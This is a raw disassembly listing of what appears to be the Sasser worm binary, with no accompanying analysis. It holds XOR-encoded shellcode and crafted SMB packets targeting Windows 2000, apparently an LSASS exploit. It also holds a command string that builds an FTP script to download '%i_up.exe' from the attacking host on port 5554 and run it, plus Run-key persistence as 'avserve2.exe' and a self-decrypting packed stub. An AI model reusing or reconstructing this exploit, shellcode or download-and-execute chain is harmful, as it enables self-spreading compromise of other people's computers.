aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403C6B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd offset word_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B08+1A�r
; sub_401B08+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B08+77�r
; sub_401B08+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B08+A8�r
; sub_401B08+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B08+2BC�r
; sub_401B08+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B08+184�r
; sub_401B08+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B08+1B9�r
; sub_401B08+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:off_4068C8�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 dword_406A34 dd 1CEC8166h dword_406A38 dd 0E4FF07h dword_406A3C dd 302E35h dword_406A40 dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: sub_401B08+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B08+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B08+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: sub_401B08+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B08+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B08+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B08+64�o
align 4
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: sub_402029+50�o
align 4
aJobaka3 db 'Jobaka3',0 ; DATA XREF: sub_402029+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset sub_402AFF ; DATA XREF: sub_402934+1C�r
dword_406AD4 dd 2 ; sub_4035C9+46�r
align 10h
off_406AE0 dd offset word_406AEA ; DATA XREF: sub_402810+1E�r
; sub_402A4C+12�r ...
dd offset word_406AEA
db 2 dup(0)
word_406AEA dw 20h ; DATA XREF: sub_403876+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; sub_402D04+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 dword_406D74 dd 7 dword_406D78 dd 0Ah dword_406D7C dd 8Ch ; sub_402BC3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; sub_403496+2�o
dword_406DA0 dd 2 ; sub_4035C9+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: sub_4035C9+FC�r
; sub_4035C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: sub_4035C9+1B�o
; sub_4038A7+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h dword_406E3C dd 82798260h, 21h, 0dword_406E48 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; sub_403CF4+5�r
align 10h
dword_406F30 dd 0 ; sub_401000+10�w ...
dword_406F34 dd 0 ; sub_401210+D�r
dword_406F38 dd 0 ; sub_401398+C�o ...
dword_406F3C dd 0 ; sub_402680+91�w
dword_406F40 dd 0 ; sub_402D9F:loc_402DB1�r ...
align 8
dword_406F48 dd 0 dd 3 dup(0)
dword_406F58 dd 0 dword_406F5C dd 0 dword_406F60 dd 0 dword_406F64 dd 0 dword_406F68 dd 0 dword_406F6C dd 0 dd 0
dword_406F74 dd 0 dd 3 dup(0)
dword_406F84 dd 0 dd 0
byte_406F8C db 0 ; DATA XREF: sub_402B10+2D�w
align 10h
dword_406F90 dd 0 dword_406F94 dd 0 ; sub_402B10+8B�w
dword_406F98 dd 0 ; sub_402BC3+46�w ...
dword_406F9C dd 38h dup(0) dword_40707C dd 9 dup(0) ; .text:00406638�o ...
dword_4070A0 dd 0 ; sub_4030A5+23�w ...
dword_4070A4 dd 0 dword_4070A8 dd 0 ; sub_40371C:loc_403786�w
dword_4070AC dd 0 ; sub_403A40+4�w ...
dword_4070B0 dd 0 ; resolved to->USER32.MessageBoxA ; sub_404573+2E�w ...
dword_4070B4 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_404573:loc_4045C2�r
dword_4070B8 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_404573+60�r
dd 2 dup(0)
dword_4070C4 dd 0 dd 3 dup(0)
dword_4070D4 dd 0 ; sub_403A40+3A�r ...
dd 0
dword_4070DC dd 0 ; sub_4046FE+4C�w ...
dword_4070E0 dd 0 dword_4070E4 dd 0 dword_4070E8 dd 0 ; sub_4043C7+5�r ...
dword_4070EC dd 0 ; sub_403D93+259�r ...
dword_4070F0 dd 0 ; sub_403D93+310�w ...
dword_4070F4 dd 0 ; sub_403D93+22C�r ...
dword_4070F8 dd 0 ; sub_403D68�r ...
dword_4070FC dd 0 ; sub_403D68+8�r ...
dword_407100 dd 0 ; sub_4038A7+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; sub_4038A7+171�o ...
dword_40711C dd 0 ; sub_4038A7+15D�w ...
byte_407120 db 0 ; DATA XREF: sub_403AE6:loc_403BF2�w
; sub_403AE6:loc_403C0F�w ...
align 4
dd 3Fh dup(0)
byte_407220 db 0 ; DATA XREF: sub_4038A7+5C�o
; sub_4038A7+AF�o ...
byte_407221 db 0 ; DATA XREF: sub_402EF1+3F�r
; sub_402EF1+84�r ...
align 4
dd 40h dup(0)
dword_407324 dd 0 ; sub_4038A7+12B�w ...
dword_407328 dd 0 ; sub_403382+29�r ...
dd 5 dup(0)
dword_407340 dd 0 ; sub_4031D7+45�r ...
dword_407344 dd 3Fh dup(0) dword_407440 dd 0 ; sub_4031D7:loc_403261�r ...
dword_407444 dd 0 dword_407448 dd 0 dword_40744C dd 0 dword_407450 dd 0 ; sub_402B10+57�r
dword_407454 dd 0 dword_407458 dd 0 ; sub_402D47+F�r ...
dd 6E9h dup(0)
_text ends
; Section 2. (virtual address 00009000)
; Virtual size : 00017010 ( 94224.)
; Section size in file : 00017010 ( 94224.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 409000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 4 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C809A51h, 7C809AE4h, 0
dd 9010h, 0
dd 0FFFFFFFFh, 904Ch, 9010h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 47000000h, 72507465h, 6441636Fh
dd 73657264h, 73h, 72695600h, 6C617574h, 6F6C6C41h, 63h
dd 72695600h, 6C617574h, 65657246h, 0A2330000h, 0E80E30B5h
dd 0FCF83644h, 0F4476A36h, 9E7F9BDCh, 13B5857Ch, 0EF54DD1Ch
dd 0A18418CFh, 0CA90E8A8h, 3E8CE63Fh, 0A88320ACh, 50000802h
dd 8B600000h, 8B242474h, 247Ch, 245C8B28h, 1B8BFC2Ch, 0DB85C933h
dd 80B21074h, 0DF030000h, 0E803B1A4h, 66h, 0FB3BF673h
dd 7C73h, 33575553h, 0ED3343DBh, 7C8DC38Bh, 0EB8B001Dh
dd 0DF8B0800h, 0F11C49E8h, 3D5C8Dh, 800C703h, 3AE8EF8Bh
dd 5D5FE20Eh, 73C12B5Bh, 8B090000h, 34E8C5h, 1CEB0000h
dd 0AC08E0C1h, 0E840h, 28h, 13DE88Bh, 83000040h, 813DFFD9h
dd 7076000h, 2BF78B56h, 5EA4F3F0h, 4141h, 0D20295EBh, 168A0575h
dd 0C3D21246h, 0E841C933h, 0FFEE0000h, 0C913FFFFh, 0FFFFE7E8h
dd 0C3F272FFh, 107C2Bh, 7C892824h, 0C2611C24h, 0B4480010h
dd 40003085h, 563E03h, 90100060h, 90140000h, 7DF80000h
dd 77F40000h, 7FFDEBF8h, 6600h, 0B8h, 80305488h, 400001Dh
dd 9A330000h, 0F8904000h, 56630000h, 0F2A0000h, 40010000h
dd 501C02h, 4CAB00h, 6109B800h, 3100F61h, 6430056h, 1004h
dd 3CA5h, 80000h, 880105h, 51530000h, 55565752h, 1DE84000h
dd 30ED815Dh, 8D100011h, 25B5h, 8B100011h, 0C083FC46h
dd 8BF02B04h, 468B0856h, 31C0041h, 89088BC2h, 17128F8Dh
dd 0C418520h, 14240C93h, 0C970C06h, 0C100028h, 8BDE0C9Bh
dd 0F6854473h, 0E74h, 2BB9h, 8BF20300h, 0FA03407Bh, 0F38BA4F3h
dd 8D8D0000h, 1000129Fh, 226E851h, 4E8B0000h, 808B2Ch
dd 56032456h, 68406A08h, 6A5197h, 12FF0000h, 128B8589h
dd 0E8561000h, 3D7h, 2041E856h, 0CB0504DFh, 20620502h
dd 85343280h, 89840FC9h, 4E54h, 0E8565108h, 53Eh, 7B74C085h
dd 176F958Bh, 10000000h, 17738D8Bh, 0C9851000h, 8D8D0875h
dd 1367h, 2DEB1000h, 0C1F7h, 1E748000h, 0FFE18152h, 0FFFF0000h
dd 858D517Fh, 10001323h, 3C858D50h, 4000018h, 95FF5010h
dd 8B1D257Dh, 0C8030846h, 414100F8h, 858D5152h, 2B012D1h
dd 8D106A1Eh, 6A15BB85h, 0FF000800h, 1177995h, 13C395FFh
dd 401000h, 800068h, 0FF006A00h, 468BB8B5h, 8B280000h
dd 0C703087Eh, 468B10FFh, 5DC7030Ch, 97C5F5Eh, 0C35B595Ah
dd 205Eh, 100013A2h, 100013BBh, 1088142h, 6D100013h, 56100013h
dd 451B0000h, 7972746Eh, 696F5020h, 4E20746Eh, 746Fh, 756F4620h
dd 5400646Eh, 70206568h, 65636F72h, 7564030Ch, 65206572h
dd 7023h, 20732523h, 6C756F63h, 6F6E2064h, 65622074h, 6C200000h
dd 7461636Fh, 69206465h, 6874206Eh, 2065h, 616E7964h, 2063696Dh
dd 6B6E696Ch, 62696C20h, 617200C0h, 25207972h, 6F512E73h
dd 1DD6472h, 6C616E69h, 1642520h, 615B4300h, 5D796Eh, 1000138Ch
dd 0BD638098h, 65737500h, 33720000h, 6C642E32h, 654D006Ch
dd 67617373h, 4265h, 41786Fh, 72707377h, 66746E69h, 656B0041h
dd 6E720B00h, 45226C65h, 50746978h, 73DD8056h, 0CAF0073h
db 0, 49h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push ebp
push ebx
push edi
push esi
add [eax-147EA45Bh], al
setalc
adc eax, [eax]
adc [ebx+0E8B0875h], cl ; CODE XREF: .rsrc:0040946D�j
add eax, [eax-0AE34F8h]
xchg eax, ebx
xchg eax, ebp
test eax, eax
jz short loc_409471
mov [eax], esp
add [ebp-4], eax
mov edx, [esi+4] ; CODE XREF: .rsrc:00409441�j
add edx, ebx
jle short near ptr loc_40943C+2
mov eax, [edx] ; CODE XREF: .rsrc:00409462�j
test [edx], eax
add al, al
jz short loc_409465
push edx
mov eax, [edx]
add eax, ebx
push eax
push dword ptr [ebp-4]
call dword ptr [ebx-7A51E000h]
sal byte ptr [esp+edx-55h], 5Ah
add edx, 4
jmp short near ptr loc_409443+1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_409465: ; CODE XREF: .rsrc:00409449�j
add [ebx+68B0CC6h], al
test eax, eax
jnz short near ptr loc_409425+5
xor eax, eax
loc_409471: ; CODE XREF: .rsrc:00409435�j
jmp short near ptr dword_409478
; ---------------------------------------------------------------------------
db 0B8h
dd 56FFFFh
dword_409478 dd 5F5EFFFFh, 0C2C95D5Bh, 6E000004h, 8B087D8Bh, 5F8B0447h
; CODE XREF: .rsrc:loc_409471�j
dd 74C33B08h, 8B44h, 0F6853877h, 0F3033D74h, 0D82BD38Bh
dd 0ADFC5D89h, 0D88B0000h, 85ADDA03h, 8B2A74C0h, 8E983C8h
dd 0C985h, 0AD66ED74h, 0E781F88Bh, 0FFFh, 0C166FB03h, 0CE80000h
dd 3F88366h, 458B0575h, 490701FCh, 15887549h, 62CCEBE1h
dd 555F0600h, 0D2085D8Bh, 0A9ED815Dh, 8890014h, 3C4E8B10h
dd 8004AADBh, 83085667h, 0B70F48C3h, 18A90C43h, 1075E4C1h
dd 6F75D0A9h, 0FFA94601h, 7EEB6875h, 338B51h, 53085418h
dd 0EB8BC933h, 0E5BB70Fh, 0CF3B0000h, 68B4D7Dh, 1275FF3Ch
dd 7425FC80h, 8005h, 87515FCh, 8306C683h, 0E4EB06C1h, 0E74E83Ch
dd 0E93C0000h, 468B2975h, 0F8385701h, 8EB1875h, 8B57h
dd 0D8380146h, 0C1660E75h, 0C0C108E8h, 2BC48610h, 89C10000h
dd 835F0146h, 0C18305C6h, 46B3EB05h, 0EB41h, 0EB595BAFh
dd 8B575118h, 0FFA033Bh, 830E4BB7h, 2EC0000h, 57525166h
dd 16E8h, 83595F00h, 5610C3h, 0E9057449h, 0FFFFFF5Ch, 0D400045Dh
dd 8758B60h, 104D8B66h, 20C558Bh, 3071980h, 88966C2h, 0C961F4EBh
dd 1E2B0CC2h, 800800E6h, 100015FFh, 1591858Dh, 0D0C2D21Bh
dd 0A78B0889h, 48896105h, 22CC1604h, 16011649h, 2000A90Ch
dd 0E9407525h, 0A4h, 3F28B51h, 8B331980h, 84B84BDh, 0F9C1C18Bh
dd 0F3020014h, 83C803A5h, 0A4F303E1h, 9B60FC8Bh, 47B03FAh
dd 591B00F7h, 8B5D69EBh, 4087Dh, 163403h, 0F78B5110h, 8B30772Bh
dd 0C600A8FEh, 0C703574Ah, 10015256h, 0A68D8D5Ch, 84B8B51h
dd 8D8D89h, 5105B60Ch, 0D0FF5657h, 50A18B5Ah, 0E6E63C8h
dd 5F5E6678h, 4ED7B1EBh, 0B2383A38h, 16B70DC8h, 740D1500h
dd 0E083F259h, 5007402h, 738B514Ah, 4B8B8604h, 74000308h
dd 7B8B62F2h, 8BFA0304h, 84B02C3h, 0AAF3C033h, 1D083B82h
dd 17002610h, 7FADE285h, 0C758B56h, 5D8B0002h, 39C03308h
dd 4751046h, 2C740639h, 741C3000h, 8430303h, 30C4E8Bh
dd 84Bh, 85107E8Bh, 30374FFh, 5750087Bh, 19E85351h, 0
dd 0FFF88300h, 0C6830774h, 33C9EB14h, 22505EC0h, 0A6C2C9h
dd 5340A315h, 0AF193855h, 0C459986h, 83892704h, 89C033A2h
dd 0A4E66083h, 75FFB88Bh, 11FF0Ch, 0FC4589D2h, 7F74C085h
dd 10758Bh, 14557280h, 275D285h, 0F685D68Bh, 0F28B0275h
dd 0CA43E00Ch, 0C7100017h, 10384331h, 0B85249DEh, 0E1A94941h
dd 13808B0Ah, 0E2E28112h, 5D8B0BEBh, 1808B08h, 8530312h
dd 3E02C283h, 18092D58h, 10001311h, 900752h, 0C0855400h
dd 895A1174h, 83028906h, 0C68304C2h, 0EB0400B6h, 0EBC0339Bh
dd 63F5A06h, 0C95B5D05h, 0EF0063C2h, 748B6000h, 7C8B2424h
dd 5C8B2824h, 8BFC2C24h, 74DB851Bh, 3D2334Eh, 0FB3BA4DFh
dd 20E84573h, 73000000h, 27E8F4h, 0E8910000h, 21h, 41414848h
dd 0AC08E0C1h, 0F78B5640h, 0A4F3F02Bh, 66D7EB5Eh, 875D203h
dd 92AD6692h, 42D20366h, 40C033C3h, 0FFFFEAE8h, 0E8C013FFh
dd 0FFFFFFE3h, 2BC3F272h, 8928247Ch, 611C247Ch, 0C50010C2h
dd 5B000090h, 44000009h, 85000001h, 18000097h, 1C000090h
dd 90h, 0B8004000h, 0F04087B0h, 1082888Dh, 41891000h, 24548B01h
dd 0C528B04h, 83E902C6h, 0CA2B05C2h, 33FC4A89h, 0B0B8C3C0h
dd 64F04087h, 58Fh, 0C4830000h, 51535504h, 8D565257h, 104398h
dd 18538B10h, 406AE88Bh, 100068h, 473FF00h, 4B8B006Ah
dd 8BCA0310h, 8BD0FF01h, 338B50F8h, 318538Bh, 0C4B8BF2h
dd 858DCA03h, 1000111Dh, 8F0473FFh, 50006A00h, 0D1FF5657h
dd 8430358h, 538BF88Bh, 8BF08B18h, 0C083FC46h, 89F02B04h
dd 4B8B0856h, 244E8910h, 51144B8Bh, 0FF284E89h, 218589D7h
dd 8B100011h, 4B0359F0h, 80006818h, 6A0000h, 8B11FF57h
dd 5F5A5EC6h, 0FF5D5B59h, 95BE0h, 3F2h dup(0)
db 2 dup(0)
word_40A89A dw 0 ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dd 39DDh dup(0)
assume ds:_text
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call near ptr sub_41903E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419016 proc near ; CODE XREF: sub_41903E+4F�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_41901E: ; CODE XREF: sub_419016+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_41901E
pop ebx
retn
sub_419016 endp
; ---------------------------------------------------------------------------
mov bl, 0B5h
; START OF FUNCTION CHUNK FOR sub_41903E
loc_41902F: ; CODE XREF: sub_41903E+3A�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41903E
; =============== S U B R O U T I N E =======================================
sub_419031 proc far ; CODE XREF: sub_41903E+8�j
; sub_41903E+19�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_419065
sub_419031 endp
; =============== S U B R O U T I N E =======================================
sub_41903B proc near ; CODE XREF: sub_41903E+1C�p
; sub_41903E+22�p
rdtsc
retn
sub_41903B endp
; =============== S U B R O U T I N E =======================================
sub_41903E proc far ; CODE XREF: start+1�p
var_6 = byte ptr -6
